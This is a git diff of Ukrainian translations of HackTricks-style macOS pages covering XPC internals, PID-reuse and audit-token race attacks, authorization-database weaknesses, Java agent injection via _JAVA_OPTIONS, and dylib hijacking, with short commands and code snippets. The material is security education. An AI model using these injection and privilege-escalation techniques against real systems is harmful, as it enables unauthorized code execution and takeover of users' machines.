Функція `property_getName()` з [бібліотеки виконання Objective-C](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) визначена як підходяща функція для читання пам'яті. Функція описана нижче:
Функція `property_getName()` з [Objective-C runtime library](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) визначена як підходяща функція для читання пам'яті. Функція описана нижче:
```c
const char *property_getName(objc_property_t prop) {
return prop->name;
@ -78,7 +78,7 @@ __xpc_int64_set_value:
str x1, [x0, #0x18]
ret
```
Щоб виконати запис 64 біти за конкретною адресою, віддалений виклик структурований як:
Щоб виконати запис 64-бітного значення за певною адресою, віддалений виклик структурований як:
```c
_xpc_int64_set_value(address - 0x18, value)
```
@ -97,13 +97,13 @@ _xpc_int64_set_value(address - 0x18, value)
2. **Створення спільної пам'яті в віддаленому процесі**:
- Виділіть пам'ять для об'єкта `OS_xpc_shmem` у віддаленому процесі за допомогою віддаленого виклику `malloc()`.
- Виділіть пам'ять для об'єкта `OS_xpc_shmem` в віддаленому процесі за допомогою віддаленого виклику `malloc()`.
- Скопіюйте вміст локального об'єкта `OS_xpc_shmem` до віддаленого процесу. Однак ця початкова копія матиме неправильні імена записів пам'яті Mach за зсувом `0x18`.
3. **Виправлення запису пам'яті Mach**:
- Використовуйте метод `thread_set_special_port()` для вставки права на відправку для запису пам'яті Mach у віддалене завдання.
- Виправте поле запису пам'яті Mach за зсувом `0x18`, перезаписавши його іменем віддаленого запису пам'яті.
- Виправте поле запису пам'яті Mach за зсувом `0x18`, перезаписавши його іменем запису віддаленої пам'яті.
4. **Завершення налаштування спільної пам'яті**:
- Перевірте віддалений об'єкт `OS_xpc_shmem`.

20
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md
View File

@ -4,25 +4,25 @@
## Основна інформація
XPC, що означає XNU (ядро, яке використовується в macOS), є фреймворком для **зв'язку між процесами** на macOS та iOS. XPC надає механізм для виконання **безпечних, асинхронних викликів методів між різними процесами** в системі. Це частина парадигми безпеки Apple, що дозволяє **створювати програми з розділеними привілеями**, де кожен **компонент** працює з **тільки тими правами, які йому потрібні** для виконання своєї роботи, тим самим обмежуючи потенційні збитки від скомпрометованого процесу.
XPC, що означає XNU (ядро, яке використовується в macOS) міжпроцесна комунікація, є фреймворком для **комунікації між процесами** на macOS та iOS. XPC надає механізм для виконання **безпечних, асинхронних викликів методів між різними процесами** в системі. Це частина парадигми безпеки Apple, що дозволяє **створювати програми з розділеними привілеями**, де кожен **компонент** працює з **тільки тими правами, які йому потрібні** для виконання своєї роботи, тим самим обмежуючи потенційні збитки від скомпрометованого процесу.
XPC використовує форму міжпроцесного зв'язку (IPC), що є набором методів для різних програм, які працюють на одній системі, щоб обмінюватися даними.
XPC використовує форму міжпроцесної комунікації (IPC), яка є набором методів для різних програм, що працюють на одній системі, для обміну даними.
Основні переваги XPC включають:
1. **Безпека**: Розділяючи роботу на різні процеси, кожному процесу можуть бути надані тільки ті права, які йому потрібні. Це означає, що навіть якщо процес буде скомпрометований, його можливості завдати шкоди будуть обмежені.
2. **Стабільність**: XPC допомагає ізолювати збої в компоненті, де вони відбуваються. Якщо процес зазнає збою, його можна перезапустити без впливу на решту системи.
1. **Безпека**: Розділяючи роботу на різні процеси, кожному процесу можуть бути надані лише ті права, які йому потрібні. Це означає, що навіть якщо процес буде скомпрометований, його можливості завдати шкоди будуть обмежені.
2. **Стабільність**: XPC допомагає ізолювати збої до компонента, в якому вони відбуваються. Якщо процес зазнає збою, його можна перезапустити без впливу на решту системи.
3. **Продуктивність**: XPC дозволяє легко виконувати кілька завдань одночасно в різних процесах.
Єдиний **недолік** полягає в тому, що **розділення програми на кілька процесів**, які спілкуються через XPC, є **менш ефективним**. Але в сучасних системах це майже не помітно, а переваги переважають.
## Специфічні XPC сервіси програми
## Специфічні для програми XPC сервіси
XPC компоненти програми знаходяться **всередині самої програми.** Наприклад, у Safari ви можете знайти їх у **`/Applications/Safari.app/Contents/XPCServices`**. Вони мають розширення **`.xpc`** (як **`com.apple.Safari.SandboxBroker.xpc`**) і **також є пакетами** з основним бінарним файлом всередині: `/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/MacOS/com.apple.Safari.SandboxBroker` та `Info.plist: /Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/Info.plist`
Як ви, можливо, думаєте, **XPC компонент матиме різні права та привілеї** в порівнянні з іншими XPC компонентами або основним бінарним файлом програми. ОКРІМ випадку, якщо XPC сервіс налаштований з [**JoinExistingSession**](https://developer.apple.com/documentation/bundleresources/information_property_list/xpcservice/joinexistingsession) встановленим на “True” у його **Info.plist** файлі. У цьому випадку XPC сервіс буде працювати в **тій же сесії безпеки, що й програма**, яка його викликала.
Як ви, можливо, думаєте, **компонент XPC матиме різні права та привілеї** в порівнянні з іншими компонентами XPC або основним бінарним файлом програми. ОКРІМ випадку, якщо XPC сервіс налаштований з [**JoinExistingSession**](https://developer.apple.com/documentation/bundleresources/information_property_list/xpcservice/joinexistingsession) встановленим на “True” у його **Info.plist** файлі. У цьому випадку XPC сервіс працюватиме в **тій же сесії безпеки, що й програма**, яка його викликала.
XPC сервіси **запускаються** за допомогою **launchd** за потреби і **закриваються** після завершення всіх завдань, щоб звільнити системні ресурси. **Специфічні XPC компоненти програми можуть використовуватися тільки самою програмою**, що зменшує ризик, пов'язаний з потенційними вразливостями.
XPC сервіси **запускаються** за допомогою **launchd** за потреби і **закриваються** після завершення всіх завдань, щоб звільнити системні ресурси. **Специфічні для програми XPC компоненти можуть використовуватися лише самою програмою**, що зменшує ризик, пов'язаний з потенційними вразливостями.
## Системні XPC сервіси
@ -105,7 +105,7 @@ XPC використовує GCD для передачі повідомлень,
Додаток намагається **підключитися** до XPC сервісу, використовуючи `xpc_connection_create_mach_service`, потім launchd знаходить демон і запускає **`xpcproxy`**. **`xpcproxy`** забезпечує виконання налаштованих обмежень і створює сервіс з наданими FDs і Mach портами.
Для покращення швидкості пошуку XPC сервісу використовується кеш.
Щоб покращити швидкість пошуку XPC сервісу, використовується кеш.
Можливо відстежувати дії `xpcproxy`, використовуючи:
```bash
@ -281,7 +281,7 @@ sudo launchctl load /Library/LaunchDaemons/xyz.hacktricks.service.plist
sudo launchctl unload /Library/LaunchDaemons/xyz.hacktricks.service.plist
sudo rm /Library/LaunchDaemons/xyz.hacktricks.service.plist /tmp/xpc_server
```
## XPC Комунікація Приклад Коду Objective-C
## XPC Комунікація Приклад коду Objective-C
{{#tabs}}
{{#tab name="oc_xpc_server.m"}}
@ -446,7 +446,7 @@ return;
Як тільки використовується connect і сокет `fd` служби зібрано, можна використовувати клас `remote_xpc_connection_*`.
Можна отримати інформацію про віддалені служби, використовуючи інструмент cli `/usr/libexec/remotectl` з параметрами, такими як:
Можливо отримати інформацію про віддалені служби, використовуючи інструмент cli `/usr/libexec/remotectl` з параметрами, такими як:
```bash
/usr/libexec/remotectl list # Get bridge devices
/usr/libexec/remotectl show ...# Get device properties and services

14
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md
View File

@ -6,11 +6,11 @@
Apple також пропонує інший спосіб аутентифікації, якщо підключений процес має **дозволи на виклик відкритого методу XPC**.
Коли додаток потребує **виконання дій від імені привілейованого користувача**, замість того, щоб запускати додаток як привілейований користувач, зазвичай він встановлює як root HelperTool як XPC сервіс, який може бути викликаний з додатка для виконання цих дій. Однак, додаток, що викликає сервіс, повинен мати достатню авторизацію.
Коли додаток потребує **виконання дій від імені привілейованого користувача**, замість того, щоб запускати додаток як привілейованого користувача, зазвичай він встановлює як root HelperTool як XPC сервіс, який може бути викликаний з додатка для виконання цих дій. Однак, додаток, що викликає сервіс, повинен мати достатню авторизацію.
### ShouldAcceptNewConnection завжди YES
Приклад можна знайти в [EvenBetterAuthorizationSample](https://github.com/brenwell/EvenBetterAuthorizationSample). У `App/AppDelegate.m` він намагається **підключитися** до **HelperTool**. А в `HelperTool/HelperTool.m` функція **`shouldAcceptNewConnection`** **не перевірятиме** жодну з вимог, зазначених раніше. Вона завжди поверне YES:
Приклад можна знайти в [EvenBetterAuthorizationSample](https://github.com/brenwell/EvenBetterAuthorizationSample). У `App/AppDelegate.m` він намагається **підключитися** до **HelperTool**. А в `HelperTool/HelperTool.m` функція **`shouldAcceptNewConnection`** **не перевірятиме** жодну з вимог, зазначених раніше. Вона завжди повертатиме YES:
```objectivec
- (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection
// Called by our XPC listener when a new connection comes in. We configure the connection
@ -180,7 +180,7 @@ block(authRightName, authRightDefault, authRightDesc);
### Перевірка прав
У `HelperTool/HelperTool.m` функція **`readLicenseKeyAuthorization`** перевіряє, чи має викликач право **виконувати такий метод**, викликаючи функцію **`checkAuthorization`**. Ця функція перевірить, чи має **authData**, надіслане викликачем, **правильний формат** і потім перевірить, **що потрібно для отримання права** на виклик конкретного методу. Якщо все йде добре, **повернене `error` буде `nil`**:
У `HelperTool/HelperTool.m` функція **`readLicenseKeyAuthorization`** перевіряє, чи має викликач право **виконати такий метод**, викликаючи функцію **`checkAuthorization`**. Ця функція перевірить, чи має **authData**, надіслане викликачем, **правильний формат**, а потім перевірить, **що потрібно для отримання права** на виклик конкретного методу. Якщо все йде добре, **повернене `error` буде `nil`**:
```objectivec
- (NSError *)checkAuthorization:(NSData *)authData command:(SEL)command
{
@ -232,9 +232,9 @@ return error;
У цьому випадку, щоб викликати функцію `readLicenseKeyAuthorization`, `kCommandKeyAuthRightDefault` визначено як `@kAuthorizationRuleClassAllow`. Отже, **будь-хто може її викликати**.
### Інформація про БД
### Інформація про базу даних
Було зазначено, що ця інформація зберігається в `/var/db/auth.db`. Ви можете перерахувати всі збережені правила за допомогою:
Було згадано, що ця інформація зберігається в `/var/db/auth.db`. Ви можете перерахувати всі збережені правила за допомогою:
```sql
sudo sqlite3 /var/db/auth.db
SELECT name FROM rules;
@ -252,7 +252,7 @@ security authorizationdb read com.apple.safaridriver.allow
- Це найпряміший ключ. Якщо встановлено `false`, це вказує на те, що користувач не повинен надавати аутентифікацію для отримання цього права.
- Це використовується в **комбінації з одним з 2 нижче або вказуючи групу**, до якої повинен належати користувач.
2. **'allow-root': 'true'**
- Якщо користувач працює як root-користувач (який має підвищені дозволи), і цей ключ встановлено на `true`, root-користувач потенційно може отримати це право без подальшої аутентифікації. Однак, зазвичай, отримання статусу root-користувача вже вимагає аутентифікації, тому це не є сценарієм "без аутентифікації" для більшості користувачів.
- Якщо користувач працює як кореневий користувач (який має підвищені дозволи), і цей ключ встановлено на `true`, кореневий користувач потенційно може отримати це право без подальшої аутентифікації. Однак, зазвичай, отримання статусу кореневого користувача вже вимагає аутентифікації, тому це не є сценарієм "без аутентифікації" для більшості користувачів.
3. **'session-owner': 'true'**
- Якщо встановлено на `true`, власник сесії (в даний момент увійшовший користувач) автоматично отримає це право. Це може обійти додаткову аутентифікацію, якщо користувач вже увійшов.
4. **'shared': 'true'**
@ -291,7 +291,7 @@ authenticate-session-owner, authenticate-session-owner-or-admin, authenticate-se
У цьому випадку ми маємо те ж саме, що й у EvenBetterAuthorizationSample, [**перевірте цю лінію**](https://github.com/brenwell/EvenBetterAuthorizationSample/blob/e1052a1855d3a5e56db71df5f04e790bfd4389c4/HelperTool/HelperTool.m#L94).
Знаючи назву використовуваного протоколу, можна **вивантажити його визначення заголовка** за допомогою:
Знаючи назву використаного протоколу, можна **вивантажити його визначення заголовка** за допомогою:
```bash
class-dump /Library/PrivilegedHelperTools/com.example.HelperTool

22
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md
View File

@ -4,33 +4,33 @@
## XPC Connecting Process Check
Коли встановлюється з'єднання з XPC сервісом, сервер перевіряє, чи дозволено це з'єднання. Ось перевірки, які зазвичай виконуються:
Коли встановлюється з'єднання з XPC сервісом, сервер перевіряє, чи дозволено це з'єднання. Це перевірки, які зазвичай виконуються:
1. Перевірте, чи **підписаний процес Apple-сертифікатом** (видається тільки Apple).
1. Перевірте, чи **підписаний процес** сертифікатом, підписаним Apple (видається тільки Apple).
- Якщо це **не перевірено**, зловмисник може створити **підроблений сертифікат**, щоб відповідати будь-якій іншій перевірці.
2. Перевірте, чи підписаний процес **сертифікатом організації** (перевірка ID команди).
2. Перевірте, чи процес підписаний **сертифікатом організації** (перевірка ID команди).
- Якщо це **не перевірено**, **будь-який сертифікат розробника** від Apple може бути використаний для підпису та підключення до сервісу.
3. Перевірте, чи **містить процес правильний ідентифікатор пакета**.
3. Перевірте, чи процес **містить правильний ідентифікатор пакета**.
- Якщо це **не перевірено**, будь-який інструмент, **підписаний тією ж організацією**, може бути використаний для взаємодії з XPC сервісом.
4. (4 або 5) Перевірте, чи має процес **правильний номер версії програмного забезпечення**.
- Якщо це **не перевірено**, старі, небезпечні клієнти, вразливі до ін'єкцій процесів, можуть бути використані для підключення до XPC сервісу, навіть якщо інші перевірки виконані.
5. (4 або 5) Перевірте, чи має процес **захищений час виконання без небезпечних прав** (як ті, що дозволяють завантажувати довільні бібліотеки або використовувати змінні середовища DYLD).
1. Якщо це **не перевірено**, клієнт може бути **вразливим до ін'єкцій коду**.
- Якщо це **не перевірено**, старі, небезпечні клієнти, вразливі до ін'єкції процесів, можуть бути використані для підключення до XPC сервісу, навіть якщо інші перевірки виконані.
5. (4 або 5) Перевірте, чи має процес жорсткий час виконання без небезпечних прав (як ті, що дозволяють завантажувати довільні бібліотеки або використовувати змінні середовища DYLD).
1. Якщо це **не перевірено**, клієнт може бути **вразливим до ін'єкції коду**.
6. Перевірте, чи має процес **право**, яке дозволяє йому підключатися до сервісу. Це стосується бінарних файлів Apple.
7. **Перевірка** повинна **базуватися** на **аудитному токені клієнта** **замість** його ідентифікатора процесу (**PID**), оскільки перше запобігає **атакам повторного використання PID**.
7. **Перевірка** повинна бути **базована** на **аудитному токені клієнта** **замість** його ідентифікатора процесу (**PID**), оскільки перше запобігає **атакам повторного використання PID**.
- Розробники **рідко використовують API виклик аудитного токена**, оскільки він **приватний**, тому Apple може **змінити** його в будь-який момент. Крім того, використання приватних API не дозволено в додатках Mac App Store.
- Якщо використовується метод **`processIdentifier`**, він може бути вразливим.
- **`xpc_dictionary_get_audit_token`** слід використовувати замість **`xpc_connection_get_audit_token`**, оскільки останній також може бути [вразливим у певних ситуаціях](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/).
### Communication Attacks
Для отримання додаткової інформації про атаку повторного використання PID дивіться:
Для отримання додаткової інформації про атаку повторного використання PID перевірте:
{{#ref}}
macos-pid-reuse.md
{{#endref}}
Для отримання додаткової інформації про атаку **`xpc_connection_get_audit_token`** дивіться:
Для отримання додаткової інформації про атаку **`xpc_connection_get_audit_token`** перевірте:
{{#ref}}
macos-xpc_connection_get_audit_token-attack.md
@ -38,7 +38,7 @@ macos-xpc_connection_get_audit_token-attack.md
### Trustcache - Downgrade Attacks Prevention
Trustcache - це захисний метод, введений в машинах Apple Silicon, який зберігає базу даних CDHSAH бінарних файлів Apple, щоб лише дозволені, не модифіковані бінарні файли могли виконуватися. Це запобігає виконанню версій з пониженим рівнем.
Trustcache - це захисний метод, введений в машинах Apple Silicon, який зберігає базу даних CDHSAH бінарних файлів Apple, щоб лише дозволені, не модифіковані бінарні файли могли виконуватися. Це запобігає виконанню версій зниження.
### Code Examples

6
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md
View File

@ -6,11 +6,11 @@
Коли **XPC service** macOS перевіряє викликаний процес на основі **PID**, а не на основі **audit token**, він вразливий до атаки повторного використання PID. Ця атака базується на **умовах гонки**, де **експлойт** буде **надсилати повідомлення до XPC** служби, **зловживаючи** функціональністю, а лише **після** цього виконуючи **`posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ)`** з **дозволеним** бінарним файлом.
Ця функція змусить **дозволений бінарний файл отримати PID**, але **зловмисне XPC повідомлення буде надіслано** трохи раніше. Отже, якщо **XPC** служба **використовує** **PID** для **аутентифікації** відправника і перевіряє його **ПІСЛЯ** виконання **`posix_spawn`**, вона подумає, що воно походить від **авторизованого** процесу.
Ця функція змусить **дозволений бінарний файл отримати PID**, але **зловмисне XPC повідомлення буде надіслано** безпосередньо перед цим. Отже, якщо **XPC** служба **використовує** **PID** для **автентифікації** відправника і перевіряє його **ПІСЛЯ** виконання **`posix_spawn`**, вона подумає, що воно походить від **авторизованого** процесу.
### Приклад експлойту
Якщо ви знайдете функцію **`shouldAcceptNewConnection`** або функцію, яку вона викликає, **викликаючи** **`processIdentifier`** і не викликаючи **`auditToken`**. Це, ймовірно, означає, що вона **перевіряє PID процесу**, а не токен аудиту.\
Якщо ви знайдете функцію **`shouldAcceptNewConnection`** або функцію, яку вона викликає, **яка** викликає **`processIdentifier`** і не викликає **`auditToken`**. Це, ймовірно, означає, що вона **перевіряє PID процесу**, а не токен аудиту.\
Як, наприклад, на цьому зображенні (взято з посилання):
<figure><img src="../../../../../../images/image (306).png" alt="https://wojciechregula.blog/images/2020/04/pid.png"><figcaption></figcaption></figure>
@ -18,7 +18,7 @@
Перевірте цей приклад експлойту (знову ж таки, взятий з посилання), щоб побачити 2 частини експлойту:
- Одна, яка **генерує кілька форків**
- **Кожен форк** буде **надсилати** **payload** до XPC служби, виконуючи **`posix_spawn`** одразу після надсилання повідомлення.
- **Кожен форк** буде **надсилати** **payload** до XPC служби, виконуючи **`posix_spawn`** безпосередньо після надсилання повідомлення.
> [!CAUTION]
> Для того, щоб експлойт працював, важливо ` export`` `` `**`OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES`** або вставити всередину експлойту:

10
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md
View File

@ -31,7 +31,7 @@ Mach messages надсилаються через _mach port_, який є **к
- Аудитний токен з'єднання XPC є токеном аудиту, **скопійованим з найостаннішого отриманого повідомлення**.
- Отримання **аудитного токена** з'єднання XPC є критично важливим для багатьох **перевірок безпеки**.
Хоча попередня ситуація виглядає обнадійливо, є деякі сценарії, де це не викличе проблем ([звідси](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing)):
Хоча попередня ситуація виглядає багатообіцяюче, є деякі сценарії, де це не викличе проблем ([звідси](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing)):
- Аудитні токени часто використовуються для перевірки авторизації, щоб вирішити, чи прийняти з'єднання. Оскільки це відбувається за допомогою повідомлення до сервісного порту, **з'єднання ще не встановлено**. Більше повідомлень на цьому порту просто обробляються як додаткові запити на з'єднання. Отже, будь-які **перевірки перед прийняттям з'єднання не є вразливими** (це також означає, що в межах `-listener:shouldAcceptNewConnection:` аудитний токен є безпечним). Тому ми **шукаємо XPC-з'єднання, які перевіряють конкретні дії**.
- Обробники подій XPC обробляються синхронно. Це означає, що обробник подій для одного повідомлення повинен бути завершений перед викликом для наступного, навіть на паралельних чергах. Тому всередині **обробника подій XPC аудитний токен не може бути перезаписаний** іншими звичайними (не-відповідь!) повідомленнями.
@ -43,7 +43,7 @@ Mach messages надсилаються через _mach port_, який є **к
- Сервіс **B** може викликати **привілейовану функціональність** у сервісі A, яку користувач не може
- Сервіс **A** викликає **`xpc_connection_get_audit_token`** під час _**не**_ всередині **обробника подій** для з'єднання в **`dispatch_async`**.
- Отже, **інше** повідомлення може **перезаписати аудитний токен**, оскільки воно надсилається асинхронно поза обробником подій.
- Експлойт передає **сервісу B право ВІДПРАВКИ до сервісу A**.
- Експлойт передає **сервісу B право на надсилання до сервісу A**.
- Отже, svc **B** фактично **надсилає** **повідомлення** до сервісу **A**.
- **Експлойт** намагається **викликати** **привілейовану дію.** У RC svc **A** **перевіряє** авторизацію цієї **дії**, поки **svc B перезаписує аудитний токен** (надаючи експлойту доступ до виклику привілейованої дії).
2. Variant 2:
@ -71,12 +71,12 @@ Mach messages надсилаються через _mach port_, який є **к
Щоб виконати атаку:
1. Ініціюйте **з'єднання** з сервісом, названим `smd`, використовуючи стандартний протокол XPC.
2. Сформуйте вторинне **з'єднання** з `diagnosticd`. На відміну від звичайної процедури, замість створення та надсилання двох нових mach ports, право на відправку клієнтського порту замінюється дублікатом **права на відправку**, пов'язаного з з'єднанням `smd`.
2. Сформуйте вторинне **з'єднання** з `diagnosticd`. На відміну від звичайної процедури, замість створення та надсилання двох нових mach ports, право на надсилання клієнтського порту замінюється дублікатом **права на надсилання**, пов'язаного з з'єднанням `smd`.
3. В результаті XPC повідомлення можуть бути надіслані до `diagnosticd`, але відповіді від `diagnosticd` перенаправляються до `smd`. Для `smd` здається, що повідомлення як від користувача, так і від `diagnosticd` походять з одного з'єднання.
![Image depicting the exploit process](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/exploit.png)
4. Наступний крок полягає в тому, щоб дати вказівку `diagnosticd` розпочати моніторинг вибраного процесу (можливо, власного користувача). Одночасно надсилається потік звичайних 1004 повідомлень до `smd`. Намір тут - встановити інструмент з підвищеними привілеями.
4. Наступний крок полягає в тому, щоб дати вказівку `diagnosticd` розпочати моніторинг вибраного процесу (можливо, власного користувача). Одночасно надсилається потік звичайних 1004 повідомлень до `smd`. Намір тут полягає в установці інструмента з підвищеними привілеями.
5. Ця дія викликає умову гонки в функції `handle_bless`. Таймінг критичний: виклик функції `xpc_connection_get_pid` повинен повернути PID процесу користувача (оскільки привілейований інструмент знаходиться в пакеті додатка користувача). Однак функція `xpc_connection_get_audit_token`, зокрема в підпрограмі `connection_is_authorized`, повинна посилатися на аудитний токен, що належить `diagnosticd`.
## Variant 2: reply forwarding
@ -112,7 +112,7 @@ Mach messages надсилаються через _mach port_, який є **к
- **Складнощі в знаходженні екземплярів**: Пошук екземплярів використання `xpc_connection_get_audit_token` був складним, як статично, так і динамічно.
- **Методологія**: Frida була використана для підключення до функції `xpc_connection_get_audit_token`, фільтруючи виклики, які не походять з обробників подій. Однак цей метод був обмежений до підключеного процесу і вимагав активного використання.
- **Інструменти аналізу**: Інструменти, такі як IDA/Ghidra, використовувалися для вивчення досяжних mach сервісів, але процес був трудомістким, ускладненим викликами, що стосуються спільного кешу dyld.
- **Обмеження скриптів**: Спроби написати скрипт для аналізу викликів до `xpc_connection_get_audit_token` з блоків `dispatch_async` були ускладнені складнощами в парсингу блоків і взаємодією з спільним кешем dyld.
- **Обмеження скриптів**: Спроби створити скрипт для аналізу викликів до `xpc_connection_get_audit_token` з блоків `dispatch_async` були ускладнені складнощами в парсингу блоків і взаємодією з спільним кешем dyld.
## The fix <a href="#the-fix" id="the-fix"></a>

6
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md
View File

@ -83,7 +83,7 @@ export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'
open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"
```
> [!CAUTION]
> Створення агента з **іншою версією Java**, ніж у додатку, може призвести до збою виконання як агента, так і додатку
> Створення агента з **іншою версією Java** від програми може призвести до збою виконання як агента, так і програми
Де агент може бути:
```java:Agent.java
@ -126,7 +126,7 @@ open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Profession
## vmoptions файл
Цей файл підтримує специфікацію **Java параметрів** під час виконання Java. Ви можете використовувати деякі з попередніх трюків, щоб змінити java параметри та **змусити процес виконувати довільні команди**.\
Більше того, цей файл також може **включати інші** за допомогою директорії `include`, тому ви також можете змінити включений файл.
Більше того, цей файл також може **включати інші** з директорії `include`, тому ви також можете змінити включений файл.
Ще більше, деякі Java додатки **завантажать більше ніж один `vmoptions`** файл.
@ -141,7 +141,7 @@ open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Profession
2023-12-13 19:53:23.922 studio[74913:581359] parseVMOptions: /Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
2023-12-13 19:53:23.923 studio[74913:581359] parseVMOptions: platform=20 user=1 file=/Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
```
Якщо вони цього не роблять, ви можете легко перевірити це за допомогою:
Якщо вони цього не зроблять, ви можете легко перевірити це за допомогою:
```bash
# Monitor
sudo eslogger lookup | grep vmoption # Give FDA to the Terminal

18
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md
View File

@ -22,7 +22,7 @@ macos-dyld-process.md
> [!NOTE]
> З 2012 року **Apple значно зменшила потужність** **`DYLD_INSERT_LIBRARIES`**.
>
> Перейдіть до коду та **перевірте `src/dyld.cpp`**. У функції **`pruneEnvironmentVariables`** ви можете побачити, що **`DYLD_*`** змінні видаляються.
> Перейдіть до коду і **перевірте `src/dyld.cpp`**. У функції **`pruneEnvironmentVariables`** ви можете побачити, що **`DYLD_*`** змінні видаляються.
>
> У функції **`processRestricted`** встановлюється причина обмеження. Перевіряючи цей код, ви можете побачити, що причини такі:
>
@ -59,7 +59,7 @@ macos-dyld-hijacking-and-dyld_insert_libraries.md
> [!CAUTION]
> Пам'ятайте, що **попередні обмеження перевірки бібліотек також застосовуються** для виконання атак на викрадення Dylib.
Як і в Windows, в MacOS ви також можете **викрадати dylibs**, щоб змусити **додатки** **виконувати** **произвольний** **код** (насправді, для звичайного користувача це може бути неможливо, оскільки вам може знадобитися дозвіл TCC для запису всередині пакету `.app` і викрадення бібліотеки).\
Як і в Windows, в MacOS ви також можете **викрадати dylibs**, щоб змусити **додатки** **виконувати** **произвольний** **код** (насправді, для звичайного користувача це може бути неможливо, оскільки вам може знадобитися дозвіл TCC, щоб записати в пакет `.app` і викрасти бібліотеку).\
Однак спосіб, яким **додатки MacOS** **завантажують** бібліотеки, є **більш обмеженим**, ніж у Windows. Це означає, що **розробники шкідливого ПЗ** все ще можуть використовувати цю техніку для **прихованості**, але ймовірність того, що вони зможуть **зловживати цим для ескалації привілеїв, значно нижча**.
По-перше, **більш поширено** знаходити, що **бінарні файли MacOS вказують повний шлях** до бібліотек для завантаження. По-друге, **MacOS ніколи не шукає** в папках **$PATH** для бібліотек.
@ -87,7 +87,7 @@ time stamp 2 Wed Jun 21 12:23:31 1969
current version 1.0.0
compatibility version 1.0.0
```
- **Налаштовано з @rpath**: Бінарні файли Mach-O можуть мати команди **`LC_RPATH`** та **`LC_LOAD_DYLIB`**. Виходячи з **значень** цих команд, **бібліотеки** будуть **завантажені** з **різних директорій**.
- **Налаштовано з @rpath**: Бінарні файли Mach-O можуть мати команди **`LC_RPATH`** та **`LC_LOAD_DYLIB`**. На основі **значень** цих команд **бібліотеки** будуть **завантажені** з **різних директорій**.
- **`LC_RPATH`** містить шляхи до деяких папок, які використовуються для завантаження бібліотек бінарним файлом.
- **`LC_LOAD_DYLIB`** містить шлях до конкретних бібліотек для завантаження. Ці шляхи можуть містити **`@rpath`**, який буде **замінений** значеннями в **`LC_RPATH`**. Якщо в **`LC_RPATH`** є кілька шляхів, всі вони будуть використані для пошуку бібліотеки для завантаження. Приклад:
- Якщо **`LC_LOAD_DYLIB`** містить `@rpath/library.dylib`, а **`LC_RPATH`** містить `/application/app.app/Contents/Framework/v1/` та `/application/app.app/Contents/Framework/v2/`. Обидві папки будуть використані для завантаження `library.dylib`**.** Якщо бібліотека не існує в `[...]/v1/`, зловмисник може помістити її туди, щоб викрасти завантаження бібліотеки в `[...]/v2/`, оскільки порядок шляхів у **`LC_LOAD_DYLIB`** дотримується.
@ -145,7 +145,7 @@ macos-dyld-hijacking-and-dyld_insert_libraries.md
>
> - Якщо процес є **необмеженим**, зловживаючи **відносним шляхом з CWD** та згаданими змінними середовища (навіть якщо в документації не сказано, що якщо процес обмежений, змінні середовища DYLD_* видаляються)
- Коли шлях **містить косу риску, але не є шляхом фреймворка** (тобто повний шлях або частковий шлях до dylib), dlopen() спочатку шукає (якщо встановлено) у **`$DYLD_LIBRARY_PATH`** (з частиною шляху). Далі dyld **пробує вказаний шлях** (використовуючи поточну робочу директорію для відносних шляхів (але лише для необмежених процесів)). Нарешті, для старих бінарних файлів dyld спробує резервні варіанти. Якщо **`$DYLD_FALLBACK_LIBRARY_PATH`** було встановлено під час запуску, dyld буде шукати в цих директоріях, інакше dyld буде шукати в **`/usr/local/lib/`** (якщо процес необмежений), а потім у **`/usr/lib/`**.
- Коли шлях **містить косу риску, але не є шляхом фреймворка** (тобто повний шлях або частковий шлях до dylib), dlopen() спочатку шукає (якщо встановлено) в **`$DYLD_LIBRARY_PATH`** (з частиною шляху). Далі dyld **пробує вказаний шлях** (використовуючи поточну робочу директорію для відносних шляхів (але лише для необмежених процесів)). Нарешті, для старих бінарних файлів dyld спробує резервні варіанти. Якщо **`$DYLD_FALLBACK_LIBRARY_PATH`** було встановлено під час запуску, dyld буде шукати в цих директоріях, інакше dyld буде шукати в **`/usr/local/lib/`** (якщо процес необмежений), а потім у **`/usr/lib/`**.
1. `$DYLD_LIBRARY_PATH`
2. вказаний шлях (використовуючи поточну робочу директорію для відносних шляхів, якщо необмежений)
3. `$DYLD_FALLBACK_LIBRARY_PATH`
@ -211,19 +211,19 @@ fprintf(stderr, "Error loading: %s\n\n\n", dlerror());
return 0;
}
```
Якщо ви скомпілюєте та виконаєте його, ви зможете побачити **де кожна бібліотека була безуспішно знайдена**. Також ви могли б **фільтрувати журнали FS**:
